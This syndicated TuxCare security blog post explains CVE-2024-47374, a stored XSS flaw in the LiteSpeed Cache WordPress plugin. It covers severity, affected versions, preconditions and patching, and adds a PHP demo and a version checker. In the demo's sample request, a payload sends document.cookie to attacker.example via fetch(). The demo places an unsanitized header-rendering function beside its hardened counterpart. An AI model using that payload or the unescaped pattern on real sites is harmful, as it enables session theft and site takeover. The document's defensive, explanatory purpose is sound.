
LiteSpeed Cache plugin bug: WordPress users are exposed to XSS attacks

According to recent reports, a new bug has been discovered in the LiteSpeed Cache plugin that exposes WordPress sites to cross-site scripting (XSS) attacks. If the vulnerability is exploited, a threat actor can run arbitrary JavaScript in the browsers of the site's visitors. In this article we discuss what the bug is, how serious it is, and which versions are affected. Let's get started!

The LiteSpeed Cache plugin bug revealed

The XSS bug in the LiteSpeed Cache plugin is tracked as CVE-2024-47374. It carries a Common Vulnerability Scoring System (CVSS) score of 7.2, which rates as high severity, and affects all plugin versions up to and including 6.5.0.2. The flaw was discovered by Patchstack Alliance researcher TaiYou. Patchstack's advisory states:

“It could allow any unauthenticated user to steal sensitive information to, in this case, perform privilege escalation on the WordPress site by making a single HTTP request.”

The flaw arises because an HTTP header value is written into the page output without sanitization or output escaping, which lets a threat actor inject a malicious web script. Exploitation does, however, only succeed when the "CSS Combine" and "Generate UCSS" page optimization settings are both enabled.
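The following PHP snippet is an added illustration of the general pattern described above; it is not LiteSpeed Cache's own code, and the header name (X-Example-Vary), the markup and the file naming are assumptions chosen for the example. It contrasts a handler that concatenates a raw request header into stored HTML with a hardened version that allow-lists the value and escapes it for the attribute context it lands in.

```php
<?php
// Added illustration (not LiteSpeed Cache's code): a request header value is
// taken over as-is and later written into a cached HTML page. The header name,
// markup and file naming below are assumptions made for this example.

// Constructed sample request: the attacker fully controls the header value.
$request_headers = [
    'X-Example-Vary' => '"><script>fetch("https://attacker.example/?c="+document.cookie)</script>',
];

/**
 * Vulnerable: the raw header value is concatenated into markup that is then
 * cached, so every visitor who receives the cached page runs the script
 * (stored XSS). The closing quote and bracket break out of the href attribute.
 */
function render_vulnerable(array $headers): string
{
    $vary = $headers['X-Example-Vary'] ?? '';
    return '<link rel="stylesheet" href="/cache/ucss-' . $vary . '.css">';
}

/**
 * Hardened: first validate the value against the character set a cache-variant
 * token actually needs, then escape it for the HTML attribute it is written
 * into. Inside WordPress the escaping step would be esc_attr(); plain PHP's
 * htmlspecialchars() is used here so the script runs outside WordPress.
 */
function render_hardened(array $headers): string
{
    $vary = $headers['X-Example-Vary'] ?? '';
    // Allow-list: a cache variant is an opaque token, so reject anything else.
    if (!preg_match('/\A[A-Za-z0-9_.-]{1,64}\z/', $vary)) {
        $vary = 'default';
    }
    $safe = htmlspecialchars($vary, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<link rel="stylesheet" href="/cache/ucss-' . $safe . '.css">';
}

echo "vulnerable: " . render_vulnerable($request_headers) . PHP_EOL;
echo "hardened:   " . render_hardened($request_headers) . PHP_EOL;
```

Running it shows the vulnerable output carrying a live script element inside the page, while the hardened output falls back to ucss-default.css. The allow-list is the important step: escaping alone would neutralise this payload, but validating that the value looks like what the code expects also blocks abuse of the value in non-HTML contexts, such as cache file names.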

CVE-2024-47374 attack details

As for the attack details, CVE-2024-47374 is a stored XSS flaw: the injected script is saved by the application and served to later visitors, rather than merely reflected back to the request that carried it. Payloads in stored XSS attacks can persist in a range of locations, including:

  • The database.
  • Visitor logs.
  • Comments.
  • Forum posts.
  • Files on the web server.

These locations matter to threat actors because they ensure the malicious code runs every time a user loads the compromised page. Because the script executes in the victim's browser with the victim's cookies and session, such attacks can deliver browser-based payloads for a range of goals, including:

  • Stealing information.
  • Hijacking an authenticated user’s session.
  • Performing actions on behalf of the user.

The severity of such attacks increases dramatically when the victim account belongs to a site administrator. In that scenario the script acts with administrative privileges, and threat actors can gain complete control of the website.

Protecting against the WordPress plugin vulnerability

Online threat actors are using increasingly sophisticated methods to attack victims, and exploiting plugin vulnerabilities like this LiteSpeed Cache bug has become a common tactic for compromising legitimate websites.

The LiteSpeed Cache plugin for WordPress currently has over 6 million active installations, so a working exploit is a lucrative option for threat actors. With this in mind, it is important to know how to protect a site against this kind of WordPress vulnerability.

To protect against the vulnerability, site owners must update to the latest version of the plugin, released on September 25, 2024. Sites that cannot update immediately can reduce their exposure in the meantime by turning off the "CSS Combine" and "Generate UCSS" settings, since the exploit depends on both being enabled. This patch arrived about a month after the developers fixed another vulnerability in the plugin.
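A quick way to confirm whether an installation is in the affected range is to read the "Version:" field from the plugin's main file and compare it against 6.5.0.2, the last version the advisory lists as vulnerable. The script below is an added example, not part of the original post or the plugin; the sample plugin headers are constructed inline, and the installation path in the trailing comment is an assumption about a typical layout.

```php
<?php
// Added check (not part of the original post or the plugin): decide whether a
// LiteSpeed Cache version falls in the range the advisory calls affected,
// i.e. every release up to and including 6.5.0.2.

const LAST_AFFECTED = '6.5.0.2';

/**
 * Pull the "Version:" field out of a WordPress plugin file header comment.
 * Returns null when no version line is present.
 */
function plugin_version_from_header(string $header): ?string
{
    if (preg_match('/^[ \t\/*#@]*Version:\s*(\S+)/mi', $header, $m)) {
        return $m[1];
    }
    return null;
}

/**
 * True when $version is vulnerable to CVE-2024-47374 (<= 6.5.0.2).
 * version_compare() understands the four-component numbering WordPress
 * plugins use, so "6.5.0.2" sorts correctly against "6.5" or "6.4.1".
 */
function is_affected(string $version): bool
{
    return version_compare($version, LAST_AFFECTED, '<=');
}

// Constructed sample headers standing in for the plugin's main PHP file.
$samples = [
    "/**\n * Plugin Name: LiteSpeed Cache\n * Version: 6.5.0.2\n */",
    "/**\n * Plugin Name: LiteSpeed Cache\n * Version: 6.4\n */",
    "/**\n * Plugin Name: LiteSpeed Cache\n * Version: 7.0\n */",
    "/**\n * Plugin Name: LiteSpeed Cache\n */",
];

foreach ($samples as $header) {
    $v = plugin_version_from_header($header);
    if ($v === null) {
        echo "unknown  could not read a Version: line\n";
        continue;
    }
    printf("%-8s %s\n", $v, is_affected($v) ? 'AFFECTED, update now' : 'not in affected range');
}

// Against a live install, feed the real file instead (assumed path):
// $v = plugin_version_from_header(
//     file_get_contents('/var/www/html/wp-content/plugins/litespeed-cache/litespeed-cache.php')
// );
```

The first two samples report as affected and the third does not; the fourth shows the failure mode of a header with no version line, which the script reports rather than silently treating as safe. Remember that a patched version number only closes this bug; if the site was exposed while the vulnerable settings were on, cached pages and stored data should still be reviewed for injected scripts.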

It is worth noting that the previous vulnerability was tracked as CVE-2024-44000 and had a CVSS score of 7.5. If exploited, it could have allowed threat actors to take over arbitrary user accounts.

Conclusion

The LiteSpeed Cache plugin bug poses a significant risk to WordPress users, opening the door to XSS attacks and privilege escalation. To protect against it, site owners must update to the latest version of the plugin. Beyond patching, users should also follow proactive security practices to stay safe in an evolving threat landscape.

Sources for this piece include articles in The Hacker News and BleepingComputer.

The post LiteSpeed Cache plugin bug: WordPress users are exposed to XSS attacks appeared first on TuxCare.

*** This is a Security Bloggers Network syndicated blog from TuxCare, written by Wajahat Raja.